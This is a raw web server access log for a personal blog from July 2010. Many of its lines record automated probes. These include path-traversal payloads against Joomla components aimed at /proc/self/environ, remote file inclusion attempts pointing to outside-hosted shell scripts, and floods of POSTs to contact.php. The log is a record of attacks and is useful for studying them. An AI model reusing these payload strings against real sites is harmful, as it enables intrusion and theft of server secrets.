69.175.58.122 - - [29/Jul/2010:08:39:39 -0700] "POST /logs/access_100709.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "sonyafatah.com"
69.175.58.122 - - [29/Jul/2010:08:39:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "sonyafatah.com"
69.175.58.122 - - [29/Jul/2010:08:39:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "sonyafatah.com"
69.175.58.122 - - [29/Jul/2010:08:39:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "sonyafatah.com"
69.175.58.122 - - [29/Jul/2010:08:39:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "sonyafatah.com"
69.175.58.122 - - [29/Jul/2010:08:39:39 -0700] "POST /logs/access_100709.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "sonyafatah.com"
69.175.58.122 - - [29/Jul/2010:08:39:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "sonyafatah.com"
69.175.58.122 - - [29/Jul/2010:08:39:39 -0700] "POST /logs/access_100709.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "sonyafatah.com"
69.175.58.122 - - [29/Jul/2010:08:39:39 -0700] "POST /logs/access_100709.log%20%20/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "sonyafatah.com"
188.165.217.175 - - [29/Jul/2010:08:39:43 -0700] "GET /logs/access_100720.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
188.165.217.175 - - [29/Jul/2010:08:39:43 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
188.165.217.175 - - [29/Jul/2010:08:39:43 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.803" "sonyafatah.com"
74.55.39.186 - - [29/Jul/2010:08:39:52 -0700] "GET /logs/access_100628.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
178.63.53.120 - - [29/Jul/2010:08:42:07 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
178.63.53.120 - - [29/Jul/2010:08:42:07 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
178.63.53.120 - - [29/Jul/2010:08:42:08 -0700] "GET /logs/access_100721.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:08:42:24 -0700] "GET /logs/access_100716.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:08:42:25 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:08:42:26 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:08:42:36 -0700] "GET /logs/access_100718.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
178.63.53.120 - - [29/Jul/2010:08:43:09 -0700] "GET /logs/access_100628.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
72.55.140.4 - - [29/Jul/2010:08:43:18 -0700] "POST /e107 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
72.55.140.4 - - [29/Jul/2010:08:43:18 -0700] "POST /logs/e107 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
72.55.140.4 - - [29/Jul/2010:08:43:18 -0700] "POST /logs/access_100721.log%20%20/e107 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.28.112.47 - - [29/Jul/2010:08:43:32 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
221.130.17.17 - - [29/Jul/2010:08:43:33 -0700] "GET /blog/index.php/2007/05/23/full-text-of-interview-with-pakistan-president-gen-pervez-musharraf/ HTTP/1.1" 200 46604 "http://sonyafatah.com/blog/2007/05/23/full-text-of-interview-with-pakistan-president-gen-pervez-musharraf/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:08:44:08 -0700] "GET /%22?option=com_ckforms&controller=%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:08:47:13 -0700] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
67.28.112.78 - - [29/Jul/2010:08:47:48 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:47:49 -0700] "GET /blog/index.php/2008/07/29/stem-cell-treatment-draws-to-india/ HTTP/1.1" 200 16547 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:47:54 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.1" 200 40466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:47:56 -0700] "GET /blog/ HTTP/1.1" 200 75889 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:47:58 -0700] "GET /blog/index.php/2008/07/28/unproven-stem-cell-therapy-has-its-devotees/ HTTP/1.1" 200 13057 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:47:58 -0700] "GET /blog/index.php/2008/08/16/indias-richest-man-builds-a-vanity-project-to-live-in/ HTTP/1.1" 200 14458 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:47:59 -0700] "GET /blog/index.php/category/india/ HTTP/1.1" 200 62876 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:48:00 -0700] "GET /blog/index.php/2008/07/29/stem-cell-treatment-draws-to-india/feed/ HTTP/1.1" 200 954 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:48:01 -0700] "GET /blog/index.php/2008/07/29/stem-cell-treatment-draws-to-india/trackback/ HTTP/1.1" 302 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:48:02 -0700] "GET /blog/index.php/2008/07/29/stem-cell-treatment-draws-to-india/ HTTP/1.1" 200 16587 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:08:48:02 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:48:02 -0700] "GET /blog/index.php/2008/07/29/stem-cell-treatment-draws-to-india/ HTTP/1.1" 200 16587 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:48:05 -0700] "GET /wp-login.php?redirect_to=http%3A%2F%2Fsonyafatah.com%2Fblog%2F2008%2F07%2F29%2Fstem-cell-treatment-draws-to-india%2F HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
213.5.64.21 - - [29/Jul/2010:08:48:06 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 65526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:08:48:32 -0700] "GET /logs/access_100720.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:08:48:33 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:08:48:33 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:08:49:43 -0700] "GET /logs/access_100721.log/error.php?dir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:08:49:43 -0700] "GET /error.php?dir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:08:49:43 -0700] "GET /logs/error.php?dir=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:08:50:59 -0700] "GET /logs/access_100721.log//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:08:50:59 -0700] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
209.97.216.92 - - [29/Jul/2010:08:50:59 -0700] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:08:51:07 -0700] "GET /logs/access_100429.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:08:51:59 -0700] "GET /logs/access_100720.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:08:51:59 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:08:51:59 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:08:52:34 -0700] "GET /?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.79" "sonyafatah.com"
93.183.205.182 - - [29/Jul/2010:08:53:59 -0700] "GET /logs/access_100721.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "sonyafatah.com"
66.249.65.49 - - [29/Jul/2010:08:54:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" "sonyafatah.com"
66.249.65.49 - - [29/Jul/2010:08:54:39 -0700] "GET /blog/wp-content/uploads/2008/03/4fe23aa947979e0fa5a7d5ab4e651.thumbnail.jpeg HTTP/1.1" 200 3846 "-" "Googlebot-Image/1.0" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:08:54:47 -0700] "GET /logs/access_100717.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
206.214.220.151 - - [29/Jul/2010:08:55:06 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
206.214.220.151 - - [29/Jul/2010:08:55:13 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
208.115.111.247 - - [29/Jul/2010:08:56:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sonyafatah.com"
74.50.85.50 - - [29/Jul/2010:08:57:59 -0700] "GET /logs/access_100721.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:08:58:08 -0700] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:08:58:55 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:08:59:20 -0700] "GET /logs/access_100720.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:08:59:20 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:08:59:21 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
83.60.200.141 - - [29/Jul/2010:09:00:07 -0700] "GET /blog/index.php/feed/ HTTP/1.1" 200 65526 "-" "intraVnews/1.12 (http://www.intravnews.com/)" "sonyafatah.com"
206.214.220.151 - - [29/Jul/2010:09:00:40 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
206.214.220.151 - - [29/Jul/2010:09:00:40 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:00:46 -0700] "GET /logs/access_100719.log/?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:00:46 -0700] "GET /?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.79" "sonyafatah.com"
86.109.96.188 - - [29/Jul/2010:09:00:47 -0700] "GET /logs/?option=com_communitypolls&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.79" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:01:07 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:01:07 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:01:08 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:01:10 -0700] "GET /logs/access_100711.log/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:01:10 -0700] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:01:10 -0700] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:01:16 -0700] "GET /logs/access_100718.log/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:03:38 -0700] "GET /logs/access_100721.log/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:03:38 -0700] "GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:03:39 -0700] "GET /logs/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:39 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:39 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:40 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:40 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:41 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:41 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:42 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:43 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:43 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:46 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:47 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
77.78.97.82 - - [29/Jul/2010:09:04:47 -0700] "GET /logs/access_100711.log/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:48 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:04:48 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:09:04:56 -0700] "GET /logs/access_100716.log/%22?option=com_ckforms&controller=%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:09:04:56 -0700] "GET /%22?option=com_ckforms&controller=%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:09:04:56 -0700] "GET /logs/%22?option=com_ckforms&controller=%22../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
187.45.193.154 - - [29/Jul/2010:09:07:44 -0700] "GET /logs/access_100721.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:09:11:02 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:09:11:03 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:09:11:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:54 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:55 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:55 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:56 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:56 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:57 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:58 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:58 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
189.21.153.139 - - [29/Jul/2010:09:11:58 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "sonyafatah.com"
206.214.220.151 - - [29/Jul/2010:09:13:37 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
206.214.220.151 - - [29/Jul/2010:09:13:38 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
206.214.220.151 - - [29/Jul/2010:09:13:38 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
206.214.220.151 - - [29/Jul/2010:09:13:38 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
